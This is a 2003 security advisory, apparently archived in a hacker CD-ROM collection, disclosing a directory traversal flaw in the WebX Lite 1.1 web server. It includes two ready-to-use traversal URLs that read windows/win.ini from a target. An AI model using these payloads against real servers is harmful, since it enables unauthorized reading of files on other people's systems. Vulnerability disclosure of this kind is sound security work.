home *** CD-ROM | disk | FTP | other *** search
/ H4CK3R 14 / hacker14.iso / exploits / webx / WebX.txt
Encoding:
Text File  |  2003-10-23  |  1.9 KB  |  85 lines
  1. hello,
  2.  
  3. i am sending you a security advisory for WebX lite 1.1 web server.
  4.  
  5. ----
  6.  
  7. -=- Freedom of Voice - Freedom of Choice =-
  8.  
  9. ------------------------------------------------------------------
  10. http://members.lycos.co.uk/r34ct/  security advisory
  11. ------------------------------------------------------------------
  12.                         
  13.  
  14. dr_insane - dr_insane@pathfinder.gr
  15. September 8, 2003
  16.  
  17.  
  18.  
  19. Vunerability:
  20. ----------------
  21. 1) Directory Traversal attacks
  22.  
  23. Product:
  24. --------
  25. WebX Lite 1.1 web server
  26. WebX 1.1 web server
  27.  
  28. Description of product:
  29. -----------------------
  30. Using WebX Lite could not be simpler. First set the basic parameters of a web server, choose the Server Port and the Virtual Path where you web pages are located. Then start the server. That is it.
  31.  
  32. You can easily add web based administration/configuration, client access, and reporting features to existing applications while reusing existing subroutines, functions and classes. And the best part, you can do all this while still working in the development environment of your choice, whether it is Visual Basic, Visual C++, Delphi, or any environment that supports ActiveX controls.
  33.  
  34.  
  35. VUNERABILITY / EXPLOIT
  36. ======================
  37.  
  38. where to start...
  39.  
  40.  
  41. 1) http://[target]/../../../../../../../../../../windows/win.ini
  42. 2)http://[target]/.../.../.../.../.../.../.../windows/win.ini
  43.  
  44.  
  45. Local:
  46. ------
  47. not realy
  48.  
  49. Remote:
  50. -------
  51. real bad
  52.  
  53.  
  54.  
  55. Vendor Fix:
  56. -----------
  57. Not yet
  58.  
  59. Vendor Contact:
  60. ---------------
  61. http://www.futurewavetech.com/
  62. support@futurewavetech.com
  63.  
  64.  
  65. Credits:
  66. --------
  67. dr_insane
  68. http://members.lycos.co.uk/r34ct/
  69.  
  70.  
  71. _______________________________________________
  72.  
  73.  
  74.  
  75.  
  76.  
  77.  
  78. ----------------------------
  79. Dr_Insane
  80. members.lycos.co.uk/r34ct/
  81. ----------------------------
  82.  
  83. ______________________________________________________________________________________
  84. http://mobile.pathfinder.gr - Pathfinder Mobile logos & Ringtones! 
  85. http://www.pathfinder.gr - ─∙±σ▄φ mail ß≡ⁿ ⌠∩φ Pathfinder!